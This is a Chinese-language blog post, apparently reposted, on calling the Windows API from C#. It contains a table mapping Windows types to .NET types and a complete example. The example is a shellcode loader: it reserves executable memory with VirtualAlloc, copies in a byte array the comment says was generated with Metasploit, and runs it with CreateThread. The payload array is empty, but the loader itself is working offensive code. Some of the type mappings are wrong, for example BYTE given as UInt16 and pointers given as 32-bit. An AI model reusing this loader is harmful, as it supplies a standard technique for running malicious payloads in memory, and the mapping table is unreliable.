标签：IntPtr Int32 c# System private Windows API static UInt32

c# 调用Windows API

前言

看点代码安抚浮躁的心

对应表

API数据类型	Windows API时的数据类型
BOOL	System.Int32
BOOLEAN	System.Int32
BYTE	System.UInt16
COLORREF	System.UInt32
DWORD	System.UInt32
DWORD32	System.UInt32
DWORD64	System.UInt64
FLOAT	System.Float
HACCEL	System.IntPtr
HANDLE	System.IntPtr
HBITMAP	System.IntPtr
HBRUSH	System.IntPtr
HCONV	System.IntPtr
HCONVLIST	System.IntPtr
HCURSOR	System.IntPtr
HDC	System.IntPtr
HDDEDATA	System.IntPtr
HDESK	System.IntPtr
HDROP	System.IntPtr
HDWP	System.IntPtr
HENHMETAFILE	System.IntPtr
HFILE	System.IntPtr
HFONT	System.IntPtr
HGDIOBJ	System.IntPtr
HGLOBAL	System.IntPtr
HHOOK	System.IntPtr
HICON	System.IntPtr
HIMAGELIST	System.IntPtr
HIMC	System.IntPtr
HINSTANCE	System.IntPtr
HKEY	System.IntPtr
HLOCAL	System.IntPtr
HMENU	System.IntPtr
HMETAFILE	System.IntPtr
HMODULE	System.IntPtr
HMONITOR	System.IntPtr
HPALETTE	System.IntPtr
HPEN	System.IntPtr
HRGN	System.IntPtr
HRSRC	System.IntPtr
HSZ	System.IntPtr
HWINSTA	System.IntPtr
HWND	System.IntPtr
INT	System.Int32
INT32	System.Int32
INT64	System.Int64
LONG	System.Int32
LONG32	System.Int32
LONG64	System.Int64
LONGLONG	System.Int64
LPARAM	System.IntPtr
LPBOOL	System.Int16[]
LPBYTE	System.UInt16[]
LPCOLORREF	System.UInt32[]
LPCSTR	System.String
LPCTSTR	System.String
LPCVOID	System.UInt32
LPCWSTR	System.String
LPDWORD	System.UInt32[]
LPHANDLE	System.UInt32
LPINT	System.Int32[]
LPLONG	System.Int32[]
LPSTR	System.String
LPTSTR	System.String
LPVOID	System.UInt32
LPWORD	System.Int32[]
LPWSTR	System.String
LRESULT	System.IntPtr
PBOOL	System.Int16[]
PBOOLEAN	System.Int16[]
PBYTE	System.UInt16[]
PCHAR	System.Char[]
PCSTR	System.String
PCTSTR	System.String
PCWCH	System.UInt32
PCWSTR	System.UInt32
PDWORD	System.Int32[]
PFLOAT	System.Float[]
PHANDLE	System.UInt32
PHKEY	System.UInt32
PINT	System.Int32[]
PLCID	System.UInt32
PLONG	System.Int32[]
PLUID	System.UInt32
PSHORT	System.Int16[]
PSTR	System.String
PTBYTE	System.Char[]
PTCHAR	System.Char[]
PTSTR	System.String
PUCHAR	System.Char[]
PUINT	System.UInt32[]
PULONG	System.UInt32[]
PUSHORT	System.UInt16[]
PVOID	System.UInt32
PWCHAR	System.Char[]
PWORD	System.Int16[]
PWSTR	System.String
REGSAM	System.UInt32
SC_HANDLE	System.IntPtr
SC_LOCK	System.IntPtr
SHORT	System.Int16
SIZE_T	System.UInt32
SSIZE_	System.UInt32
TBYTE	System.Char
TCHAR	System.Char
UCHAR	System.Byte
UINT	System.UInt32
UINT32	System.UInt32
UINT64	System.UInt64
ULONG	System.UInt32
ULONG32	System.UInt32
ULONG64	System.UInt64
ULONGLONG	System.UInt64
USHORT	System.UInt16
WORD	System.UInt16
WPARAM	System.IntPtr
LPTHREAD_START_ROUTINE	UInt32
LPSECURITY_ATTRIBUTES	LPSECURITY_ATTRIBUTES

案例1

[DllImport("kernel32", EntryPoint = "VirtualAlloc")] //导入kernel32.dll，VirtualAlloc函数
public static extern UInt32 VirtualAlloc(UInt32 lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect);//声明win32 API函数

...
//调用
 UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 0x00001000, 0x40);

//或者可以写成这样

  private static UInt32 MEM_COMMIT = 0x1000;
  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

  UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);

extern 修饰符用于声明在外部实现的方法。 extern 修饰符的常见用法是在使用 Interop 服务调入非托管代码时与 DllImport 特性一起使用。在这种情况下，还必须将方法声明为 static

完整代码

    static void Main(string[] args)
        {
            // native function’s compiled code
            // generated with metasploit
            byte[] shellcode = new byte[892] {  };
           
            
            
            //UInt32 funcAddr=   VirtualAlloc(0, (uint)shellcode.Length,);
            //CreateThread(0,0, funcAddr,);
      
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data
            IntPtr pinfo = IntPtr.Zero;
            // execute native code
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport("kernel32")] 
        private static extern bool VirtualFree(IntPtr lpAddress,
        UInt32 dwSize, UInt32 dwFreeType);
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        UInt32 lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId
        );
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
        IntPtr hHandle,
        UInt32 dwMilliseconds
        );
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(
        string moduleName
        );
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(
        IntPtr hModule,
        string procName
        );
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(
        string lpFileName
        );
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();
  }

}

标签：IntPtr,Int32,c#,System,private,Windows,API,static,UInt32
From： https://www.cnblogs.com/nice0e3/p/16661576.html

c# 调用Windows API

c# 调用Windows API

前言

对应表

案例1

相关文章

赞助商

阅读排行